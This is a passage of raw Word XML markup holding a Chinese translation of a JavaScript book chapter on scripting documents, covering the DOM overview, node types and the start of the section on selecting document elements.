      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的存在使得静态的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档变成了交互式的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用。脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面内容是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的核心目标。本章</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>本书中最重要的章节之一</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>阐述了它是如何做到的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:t>章和第</w:t>
      </w:r>
      <w:r>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:t>章解释了每一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器窗口、标签页和框架由一个</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象所表示。每个</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象有一个</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>属性引用了</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示窗口的内容，它就是本章的主题。尽管如此，</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象并非独立的，它是一个巨大的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>中的核心对象，叫做文档对象模型（</w:t>
      </w:r>
      <w:r>
        <w:t>Docu</w:t>
      </w:r>
      <w:r>
        <w:t>ment Object Model</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>），它代表和操作文档的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章开始部分解释</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>的基本架构，然后进一步解释以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何在文档中查询或选取单独的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何将文档作为节点树来遍历，如何找到任何文档元素的祖先、兄弟和后代元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何查询和设置文档元素的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何查询、设置和修改文档内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何通过创建、插入和删除节点来修改文档结构。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何与</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单一起工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章最后一节涵盖其他各种文档特性，包含</w:t>
      </w:r>
      <w:r>
        <w:t>referrer</w:t>
      </w:r>
      <w:r>
        <w:t>属性、</w:t>
      </w:r>
      <w:r>
        <w:t>write()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和查询当前文档中选取的文档文本的技术等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="353" w:name="15_1_DOMGai_Lan_"/>
      <w:r>
        <w:t>15.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>概览</w:t>
      </w:r>
      <w:bookmarkEnd w:id="353"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文档对象模型（</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>）是表示和操作</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档内容的基础</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>不是特别复杂，但是需要理解大量的架构细节。首先，应该理解</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档的嵌套元素在</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>树对象中的表示。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档的树状结构包含表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签或元素（如＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞）和表示文本字符串的节点，它也可能包含表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>注释的节点。考虑以下简单的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pP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title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Sample Document</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/title</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h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r>
        <w:t>HTML Document</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>This is a</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>simple</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/i</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>document.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图</w:t>
      </w:r>
      <w:r>
        <w:t>15-1</w:t>
      </w:r>
      <w:r>
        <w:t>是此文档</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>表示的树状图。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4058728" cy="2126411"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="25" name="00025.jpeg" descr="000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00025.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4058728" cy="2126411"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>15-1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档的树状表示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果还未熟悉计算机编程中的树状结构，借用家谱图来形容是比较有用的方法。在一个节点之上的直接节点是其父节点，在其下一层的直接节点是其子节点。在同一层上具有相同父节点的节点是兄弟节点。在一个节点之下的所有层级的一组节点是其后代节点。一个节点的任何父节点、祖父节点和其上层的所有节点是祖先节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:t>15-1</w:t>
      </w:r>
      <w:r>
        <w:t>中的每个方框是文档的一个节点，它表示一个</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>对象。我们将在后续几节中讨论</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的属性和方法，并且可以在第四部分查找这些属性和方法。注意，图</w:t>
      </w:r>
      <w:r>
        <w:t>15-1</w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>种不同类型的节点。树形的根部是</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>节点，它代表整个文档。代表</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素的节点是</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点，代表文本的节点是</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点。</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的子类，在第四部分中它们有自己的条目。</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>是两个重要的</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>类，本章大部分内容将阐述它们的属性和方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:t>15-2</w:t>
      </w:r>
      <w:r>
        <w:t>展示了</w:t>
      </w:r>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t>ode</w:t>
      </w:r>
      <w:r>
        <w:t>及其在类型层次结构中的子类型。注意，通用的</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>类型与</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLDocument</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>类型之间是有严格的区别的。</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>类型代表一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档，</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>类型代表该文档中的一个元素。</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLDocument</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>子类只是针对于</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档和元素。此书中，我们经常使用通用类名</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>，甚至在指代</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档时也不例外。在第四部分中也是如此：</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLDocument</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>类型的属性和</w:t>
      </w:r>
      <w:r>
        <w:t>方法记录于</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>参考页中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251684864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4028535" cy="1984075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="26" name="00026.jpeg" descr="000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00026.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4028535" cy="1984075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>15-2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　文档节点的部分层次结构</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>值得注意的是，在图</w:t>
      </w:r>
      <w:r>
        <w:t>15-2</w:t>
      </w:r>
      <w:r>
        <w:t>中有</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>的很多子类型代表</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素的具体类型。每个类型定义多个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它们对应具体的元素或元素组（参照</w:t>
      </w:r>
      <w:r>
        <w:t>15.4.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性。有些具体元素类也定义额外的属性和方法，它们并不是简单地映射</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>语法。第四部分涵盖这些类型及其额外的特性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，请注意图</w:t>
      </w:r>
      <w:r>
        <w:t>15-2</w:t>
      </w:r>
      <w:r>
        <w:t>也展示了到目前为止还未提及的一些节点类型。</w:t>
      </w:r>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:t>节点代表</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>注释。由于注释基本上是文本</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>字符串，因此它们很像表示文档中显示文本的</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点。</w:t>
      </w:r>
      <w:r>
        <w:t>CharacterData</w:t>
      </w:r>
      <w:r>
        <w:t>通常是</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:t>的祖先，它定义这两种节点所共享的方法。</w:t>
      </w:r>
      <w:r>
        <w:t>Attr</w:t>
      </w:r>
      <w:r>
        <w:t>节点类型代表</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性，但它几乎从不使用，因为和文档节点不同，</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>类型定义了将属性当做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>对使用的方法。</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>类（未在图</w:t>
      </w:r>
      <w:r>
        <w:t>15-2</w:t>
      </w:r>
      <w:r>
        <w:t>上显示）在实际文档中并不存在的一种节点：它代表一系列没有常规父节点的节点。对一些文档操作来说</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>非常有用，</w:t>
      </w:r>
      <w:r>
        <w:t>15.6.4</w:t>
      </w:r>
      <w:r>
        <w:t>节涵</w:t>
      </w:r>
      <w:r>
        <w:t>盖这部分内容。</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>也定义了一些不经常使用的类型，如像代表</w:t>
      </w:r>
      <w:r>
        <w:t>doctype</w:t>
      </w:r>
      <w:r>
        <w:t>声明和</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>处理指令等类型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="354" w:name="15_2_Xuan_Qu_Wen_Dang_Yuan_Su_"/>
      <w:r>
        <w:t>15.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　选取文档元素</w:t>
      </w:r>
      <w:bookmarkEnd w:id="354"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>大多数客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序运行时总是在操作一个或多个文档元素。当这些程序启动时，可以使用全局变量</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>来引用</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象。但是，为了操作文档中的元素，必须通过某种方式获得或选取这些引用文档元素的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>定义许多方式来选取元素，查询文档的一个或多个元素有如下方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>用指定的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>用指定的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>用指定的标签名字；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>用指</w:t>
      </w:r>
      <w:r>
        <w:t>定的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>匹配指定的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>随后几节解释每一种元素选取技术。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="355" w:name="15_2_1_Tong_Guo_IDXuan_Qu_Yuan_Su_"/>
      <w:r>
        <w:t>15.2.1</w:t>
      </w:r>
      <w:r>
